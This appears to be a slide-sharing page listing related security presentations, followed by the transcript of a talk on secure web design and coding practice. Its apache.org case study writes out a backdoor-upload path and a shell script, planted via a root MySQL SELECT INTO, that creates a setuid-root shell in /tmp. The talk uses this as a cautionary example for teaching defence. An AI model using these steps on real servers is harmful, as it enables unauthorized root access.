Security and Web Programming/Design. cell phones bio-facilities Sodas, junk food, and coffee Welcome to the No Smoking State.

Slides:

Advertisements

Similar presentations

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

Advertisements

VM: Chapter 5 Guiding Principles for Software Security.

Automating Bespoke Attack Ruei-Jiun Chapter 13. Outline Uses of bespoke automation ◦ Enumerating identifiers ◦ Harvesting data ◦ Web application fuzzing.

Introduction The concept of “SQL Injection”

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Lecture 2 Page 1 CS 236, Spring 2008 Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Spring, 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

CS 290C: Formal Models for Web Software Lecture 10: Language Based Modeling and Analysis of Navigation Errors Instructor: Tevfik Bultan.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Stephen S. Yau CSE , Fall Security Strategies.

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department

Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Drupal Security Securing your Configuration Justin C. Klein Keane University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Software Quality Assurance Lecture #8 By: Faraz Ahmed.

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

A Security Review Process for Existing Software Applications

Attacking Applications: SQL Injection & Buffer Overflows.

Engineering Secure Software. A Ubiquitous Concern  You can make a security mistake at every step of the development lifecycle  Requirements that allow.

CGI Security COEN 351. CGI Security Security holes are exploited by user input. We need to check user input against Buffer overflows etc. that cause a.

Chapter 2. Core Defense Mechanisms. Fundamental security problem All user input is untrusted.

Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim

NMD202 Web Scripting Week3. What we will cover today Includes Exercises PHP Forms Exercises Server side validation Exercises.

OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.

 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.

Analysis of SQL injection prevention using a filtering proxy server By: David Rowe Supervisor: Barry Irwin.

Project co-funded by the European Commission within the 7th Framework Program (Grant Agreement No ) Business Convergence WS#2 Smart Grid Technologies.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

CSCE 548 Secure Software Development Taxonomy of Coding Errors.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.

SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.

Security (Keep your site secure at extension level) Sergey Gorstka Fastw3b.

PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.

COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.

PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.

Security Attacks CS 795. Buffer Overflow Problem Buffer overflow Analysis of Buffer Overflow Attacks.

Mr. Justin “JET” Turner CSCI 3000 – Fall 2015 CRN Section A – TR 9:30-10:45 CRN – Section B – TR 5:30-6:45.

Design Principles and Common Security Related Programming Problems

Writing secure Flex applications  MXML tags with security restrictions  Disabling viewSourceURL  Remove sensitive information from SWF files  Input.

Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.

ASP.NET 2.0 Security Alex Mackman CM Group Ltd

Aaron Corso COSC Spring What is LAMP?  A ‘solution stack’, or package of an OS and software consisting of:  Linux  Apache  MySQL  PHP.

Engineering Secure Software. A Ubiquitous Concern  You can make a security mistake at every step of the development lifecycle  Requirements that allow.

Advanced Accounting Information Systems Day 24 Application Security October 19, 2009.

SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.

Developing a Secure Internet Service SE Linux in Production Russell Coker Linux Consultant.

Group 18: Chris Hood Brett Poche

Building Secure ColdFusion Applications

SE-1021 Software Engineering II

On-Line Meeting 2 October 25, 2016.

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Security+ All-In-One Edition Chapter 1 – General Security Concepts

Chapter 7: Identifying Advanced Attacks

Unix System Administration

A Security Review Process for Existing Software Applications

Lecture 2 - SQL Injection

Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.

Dynamic SQL Konstantin Osipov, MySQL AB.

Understanding and Preventing Buffer Overflow Attacks in Unix

Preventing Privilege Escalation

Set-UID Privileged Programs

Presentation transcript:

Security and Web Programming/Design

cell phones bio-facilities Sodas, junk food, and coffee Welcome to the No Smoking State

who are you? where are you from? what do you do? Emacs or vi?

Warm Fuzzies Secure Design and Implementation Wordage

Security Concepts Vetting Software Design Strategy Developer practices Coding Practices Operational Practices

Security Concepts

trust transitive trust

principle of least privilege enumerating badness “best block: not be there” -- Mr. Miyage

“defense in depth”

threats vulnerabilities risks

who accepts the risk?

being paranoid

confidentiality integrity availability

protect what you can detect what you can’t prevent

hammers, nails...

a security mechanism is design to protect against a specific finite set of attacks. It usually fails gloriously when modified or used for other purposes.

don’t design your own new security protocol

the law of unintended consequences

don’t rely on the environment for protection don’t rely on good behavior don’t rely on things you can’t control

how apache.org got pwn3d

ftproot == wwwroot webuser == o+w

upload php via ftp upload backdoor code compile and execute via http c+-o+httpd+httpd.c voila! shell on web server

bugzilla talking to mysql mysql running as root mysql username/password stored script

create table with text field insert: #!/bin/sh cp /bin/sh /tmp/.rootsh chmod 4755 /tmp/.rootsh rm -f /root/.tcshrc query: SELECT... INTO ‘/root/.tchsrc’ wait for someone to “su -”

Security Vetting

What is it supposed to do? How does it work? What side effects are there? How is it deployed and maintained?

How does it fail? What is the risk? Can it be mitigated?

usability and security

understanding caring under-budget

security is an enabling task

It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily. -- Eric S. Raymond, The Art of Unix Usability

Design Strategy

top down design

goals requirements design review

what is the end result? what problem trying to solve? *not* how it is implemented

security usability performance environmental

support deployment political external

as simple as possible to meet the requirements add requirements if apparent during design be prepared to change when requirements can’t be met

for each security control what threat is addressed? Really?

recent examples

Developer Practices

The three virtues of a programmer are laziness, impatience, and hubris. -- Larry Wall

Group permissions and accounts Code Safety Test Environment Regression Testing

Coding Practices

bounds checking input validation no client-side trust error checking

sql injection cross-site scripting credential handling data mapping logging

don’t require shell for remote execution

Operational Practices

Server accounts and permissions handling credentials accountability software maintenance documentation testing and debugging